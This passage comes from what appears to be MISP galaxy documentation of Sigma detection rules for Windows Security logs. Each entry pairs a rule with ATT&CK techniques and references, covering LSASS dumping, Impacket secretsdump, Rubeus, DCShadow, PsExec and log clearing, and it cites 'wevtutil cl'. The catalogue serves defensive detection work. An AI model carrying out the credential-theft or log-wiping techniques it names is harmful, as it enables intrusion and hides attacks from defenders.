  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8967. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml

User Couldn’t Call a Privileged Service 'LsaRegisterLogonProcess'

The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.

The tag is: misp-galaxy:sigma-rules="User Couldn’t Call a Privileged Service 'LsaRegisterLogonProcess'"

User Couldn’t Call a Privileged Service 'LsaRegisterLogonProcess' has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 8968. Table References

Links

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml

Addition of SID History to Active Directory Object

An attacker can use the SID history attribute to gain additional privileges.

The tag is: misp-galaxy:sigma-rules="Addition of SID History to Active Directory Object"

Addition of SID History to Active Directory Object has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005" with estimative-language:likelihood-probability="almost-certain"

Table 8969. Table References

Links

https://adsecurity.org/?p=1772

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml

Important Scheduled Task Deleted/Disabled

Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities

The tag is: misp-galaxy:sigma-rules="Important Scheduled Task Deleted/Disabled"

Important Scheduled Task Deleted/Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 8971. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml

Remote Access Tool Services Have Been Installed - Security

Detects service installation of different remote access tools software. These software are often abused by threat actors to perform

The tag is: misp-galaxy:sigma-rules="Remote Access Tool Services Have Been Installed - Security"

Remote Access Tool Services Have Been Installed - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8972. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_install_remote_access_software.yml

Invoke-Obfuscation Via Use MSHTA - Security

Detects Obfuscated Powershell via use MSHTA in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA - Security"

Invoke-Obfuscation Via Use MSHTA - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8973. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml

Potentially Suspicious AccessMask Requested From LSASS

Detects process handle on LSASS process with certain access mask

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious AccessMask Requested From LSASS"

Potentially Suspicious AccessMask Requested From LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 8974. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml

Failed Code Integrity Checks

Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.

The tag is: misp-galaxy:sigma-rules="Failed Code Integrity Checks"

Failed Code Integrity Checks has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

Table 8975. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6281

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_codeintegrity_check_failure.yml

Password Policy Enumerated

Detects when the password policy is enumerated.

The tag is: misp-galaxy:sigma-rules="Password Policy Enumerated"

Password Policy Enumerated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 8976. Table References

Links

https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_password_policy_enumerated.yml

Device Installation Blocked

Detects an installation of a device that is forbidden by the system policy

The tag is: misp-galaxy:sigma-rules="Device Installation Blocked"

Device Installation Blocked has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

Table 8977. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423

https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml

Suspicious PsExec Execution

detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one

The tag is: misp-galaxy:sigma-rules="Suspicious PsExec Execution"

Suspicious PsExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8978. Table References

Links

https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml

Azure AD Health Monitoring Agent Registry Keys Access

This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.

The tag is: misp-galaxy:sigma-rules="Azure AD Health Monitoring Agent Registry Keys Access"

Azure AD Health Monitoring Agent Registry Keys Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 8979. Table References

Links

https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml

https://o365blog.com/post/hybridhealthagent/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml

WMI Persistence - Security

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

The tag is: misp-galaxy:sigma-rules="WMI Persistence - Security"

WMI Persistence - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 8980. Table References

Links

https://twitter.com/mattifestation/status/899646620148539397

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml

Password Protected ZIP File Opened

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

The tag is: misp-galaxy:sigma-rules="Password Protected ZIP File Opened"

Password Protected ZIP File Opened has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 8981. Table References

Links

https://twitter.com/sbousseaden/status/1523383197513379841

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml

Persistence and Execution at Scale via GPO Scheduled Task

Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale

The tag is: misp-galaxy:sigma-rules="Persistence and Execution at Scale via GPO Scheduled Task"

Persistence and Execution at Scale via GPO Scheduled Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 8982. Table References

Links

https://www.secureworks.com/blog/ransomware-as-a-distraction

https://twitter.com/menasec1/status/1106899890377052160

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml

Security Eventlog Cleared

One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution

The tag is: misp-galaxy:sigma-rules="Security Eventlog Cleared"

Security Eventlog Cleared has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 8983. Table References

Links

https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100

https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml

https://twitter.com/deviouspolack/status/832535435960209408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_audit_log_cleared.yml

Metasploit SMB Authentication

Alerts on Metasploit host’s authentications on the domain.

The tag is: misp-galaxy:sigma-rules="Metasploit SMB Authentication"

Metasploit SMB Authentication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8984. Table References

Links

https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml

Hacktool Ruler

This events that are generated when using the hacktool Ruler by Sensepost

The tag is: misp-galaxy:sigma-rules="Hacktool Ruler"

Hacktool Ruler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 8985. Table References

Links

https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776

https://github.com/sensepost/ruler/issues/47

https://github.com/sensepost/ruler

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml

Malicious Service Installations

Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.

The tag is: misp-galaxy:sigma-rules="Malicious Service Installations"

Malicious Service Installations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8986. Table References

Links

https://awakesecurity.com/blog/threat-hunting-for-paexec/

https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml

Impacket PsExec Execution

Detects execution of Impacket’s psexec.py.

The tag is: misp-galaxy:sigma-rules="Impacket PsExec Execution"

Impacket PsExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8987. Table References

Links

https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml

Remote Service Activity via SVCCTL Named Pipe

Detects remote service activity via remote access to the svcctl named pipe

The tag is: misp-galaxy:sigma-rules="Remote Service Activity via SVCCTL Named Pipe"

Remote Service Activity via SVCCTL Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8988. Table References

Links

https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml

Windows Event Auditing Disabled

Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.

The tag is: misp-galaxy:sigma-rules="Windows Event Auditing Disabled"

Windows Event Auditing Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 8989. Table References

Links

https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_auditing.yml

Invoke-Obfuscation Via Use Rundll32 - Security

Detects Obfuscated Powershell via use Rundll32 in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Rundll32 - Security"

Invoke-Obfuscation Via Use Rundll32 - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8990. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml

User Logoff Event

Detects a user log-off activity. Could be used for example to correlate information during forensic investigations

The tag is: misp-galaxy:sigma-rules="User Logoff Event"

User Logoff Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 8991. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647

https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml

Access To ADMIN$ Network Share

Detects access to ADMIN$ network share

The tag is: misp-galaxy:sigma-rules="Access To ADMIN$ Network Share"

Access To ADMIN$ Network Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8992. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml

Secure Deletion with SDelete

Detects renaming of file while deletion with SDelete tool.

The tag is: misp-galaxy:sigma-rules="Secure Deletion with SDelete"

Secure Deletion with SDelete has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"

Table 8993. Table References

Links

https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml

ADCS Certificate Template Configuration Vulnerability

Detects certificate creation with template allowing risk permission subject

The tag is: misp-galaxy:sigma-rules="ADCS Certificate Template Configuration Vulnerability"

Table 8994. Table References

Links

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml

Register new Logon Process by Rubeus

Detects potential use of Rubeus via registered new trusted logon process

The tag is: misp-galaxy:sigma-rules="Register new Logon Process by Rubeus"

Register new Logon Process by Rubeus has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 8995. Table References

Links

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml

DCERPC SMB Spoolss Named Pipe

Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.

The tag is: misp-galaxy:sigma-rules="DCERPC SMB Spoolss Named Pipe"

DCERPC SMB Spoolss Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8996. Table References

Links

https://dirkjanm.io/a-different-way-of-abusing-zerologon/

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

https://twitter.com/_dirkjan/status/1309214379003588608

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml

Invoke-Obfuscation Via Stdin - Security

Detects Obfuscated Powershell via Stdin in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin - Security"

Invoke-Obfuscation Via Stdin - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8997. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml

Metasploit Or Impacket Service Installation Via SMB PsExec

Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation

The tag is: misp-galaxy:sigma-rules="Metasploit Or Impacket Service Installation Via SMB PsExec"

Metasploit Or Impacket Service Installation Via SMB PsExec has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8998. Table References

Links

https://bczyz1.github.io/2021/01/30/psexec.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml

AD Object WriteDAC Access

Detects WRITE_DAC access to a domain object

The tag is: misp-galaxy:sigma-rules="AD Object WriteDAC Access"

AD Object WriteDAC Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"

Table 8999. Table References

Links

https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html

https://threathunterplaybook.com/library/windows/active_directory_replication.html

https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml

Kerberos Manipulation

Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.

The tag is: misp-galaxy:sigma-rules="Kerberos Manipulation"

Kerberos Manipulation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

Table 9000. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml

First Time Seen Remote Named Pipe

This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes

The tag is: misp-galaxy:sigma-rules="First Time Seen Remote Named Pipe"

First Time Seen Remote Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9001. Table References

Links

https://twitter.com/menasec1/status/1104489274387451904

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml

Invoke-Obfuscation Obfuscated IEX Invocation - Security

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation - Security"

Invoke-Obfuscation Obfuscated IEX Invocation - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 9002. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml

Transferring Files with Credential Data via Network Shares

Transferring files with well-known filenames (sensitive files with credential data) using network shares

The tag is: misp-galaxy:sigma-rules="Transferring Files with Credential Data via Network Shares"

Transferring Files with Credential Data via Network Shares has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9003. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml

Remote PowerShell Sessions Network Connections (WinRM)

Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986

The tag is: misp-galaxy:sigma-rules="Remote PowerShell Sessions Network Connections (WinRM)"

Remote PowerShell Sessions Network Connections (WinRM) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9004. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml

Suspicious LDAP-Attributes Used

Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.

The tag is: misp-galaxy:sigma-rules="Suspicious LDAP-Attributes Used"

Suspicious LDAP-Attributes Used has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"

Table 9005. Table References

Links

https://github.com/fox-it/LDAPFragger

https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961

https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml

LSASS Access From Non System Account

Detects potential mimikatz-like tools accessing LSASS from non system account

The tag is: misp-galaxy:sigma-rules="LSASS Access From Non System Account"

LSASS Access From Non System Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9006. Table References

Links

https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml

Possible Impacket SecretDump Remote Activity

Detect AD credential dumping using impacket secretdump HKTL

The tag is: misp-galaxy:sigma-rules="Possible Impacket SecretDump Remote Activity"

Possible Impacket SecretDump Remote Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9007. Table References

Links

https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml

ADCS Certificate Template Configuration Vulnerability with Risky EKU

Detects certificate creation with template allowing risk permission subject and risky EKU

The tag is: misp-galaxy:sigma-rules="ADCS Certificate Template Configuration Vulnerability with Risky EKU"

Table 9008. Table References

Links

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml

Possible DC Shadow Attack

Detects DCShadow via create new SPN

The tag is: misp-galaxy:sigma-rules="Possible DC Shadow Attack"

Possible DC Shadow Attack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207" with estimative-language:likelihood-probability="almost-certain"

Table 9009. Table References

Links

https://blog.alsid.eu/dcshadow-explained-4510f52fc19d

https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2

https://twitter.com/gentilkiwi/status/1003236624925413376

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml

Windows Defender Exclusion Deleted

Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusion Deleted"

Windows Defender Exclusion Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9010. Table References

Links

https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml

DPAPI Domain Backup Key Extraction

Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers

The tag is: misp-galaxy:sigma-rules="DPAPI Domain Backup Key Extraction"

DPAPI Domain Backup Key Extraction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

Table 9011. Table References

Links

https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml

T1047 Wmiprvse Wbemcomn DLL Hijack

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network for a WMI DLL Hijack scenario.

The tag is: misp-galaxy:sigma-rules="T1047 Wmiprvse Wbemcomn DLL Hijack"

T1047 Wmiprvse Wbemcomn DLL Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9012. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html

